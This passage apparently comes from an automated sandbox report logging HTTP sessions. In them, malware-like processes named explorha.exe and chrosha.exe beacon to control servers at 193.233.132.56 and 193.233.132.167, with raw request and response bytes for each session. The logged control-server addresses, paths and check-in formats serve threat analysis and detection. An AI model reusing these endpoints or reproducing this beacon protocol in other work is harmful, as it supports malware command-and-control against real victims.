                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      211192.168.2.550052193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:55.241091967 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:55.488780975 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      212192.168.2.550053193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:55.858253956 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:56.110320091 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      213192.168.2.550054193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:56.017062902 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:56.260581017 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:56.261573076 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:56.510672092 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      214192.168.2.550055193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:56.365078926 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:56.619240046 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      215192.168.2.550056193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:56.867306948 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:57.116779089 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:57.117664099 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:57.372199059 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      216192.168.2.550057193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:56.977468014 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:57.222347021 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      217192.168.2.550058193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:57.477798939 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:57.734023094 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      218192.168.2.550059193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:57.726686954 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:57.976329088 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:57.977828026 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:58.231252909 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      219192.168.2.550060193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:58.084778070 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:58.331248999 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      220192.168.2.550061193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:58.582355022 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:58.835098982 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      221192.168.2.550062193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:58.585127115 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:58.833991051 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:58.836147070 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:59.089234114 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      222192.168.2.550063193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:59.187922001 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:59.431694984 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      223192.168.2.550064193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:59.445780039 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:59.692914963 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:59.693774939 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
